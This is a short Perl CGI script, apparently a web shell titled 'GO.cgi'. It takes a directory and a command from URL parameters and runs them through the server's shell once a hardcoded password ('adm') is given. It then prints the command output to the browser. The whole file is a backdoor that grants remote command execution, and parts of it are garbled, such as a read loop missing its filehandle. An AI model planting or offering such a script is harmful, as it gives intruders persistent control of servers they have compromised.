#!/usr/bin/perl #change this password; for power security - delete this file =) $pwd='adm'; print "Content-type: text/html\n\n"; &read_param(); if (!defined$param{dir}){$param{dir}="/"}; if (!defined$param{cmd}){$param{cmd}="ls -la"}; if (!defined$param{pwd}){$param{pwd}='ter'}; print << "[kalabanga]"; GO.cgi Current request is:
[kalabanga] print "cd $param{dir}&&$param{cmd}"; print << "[kalabanga]";
Answer for current request is:
[kalabanga]

if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
else {
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=){print "$line";};
close (FILEHANDLE);
};

print << "[kalabanga]";
Password: Dir for next request: next request:
[kalabanga] sub read_param { $buffer = "$ENV{'QUERY_STRING'}"; @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ s/\+/ /g; $value =~ s/%20/ /g; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $param{$name} = $value; } }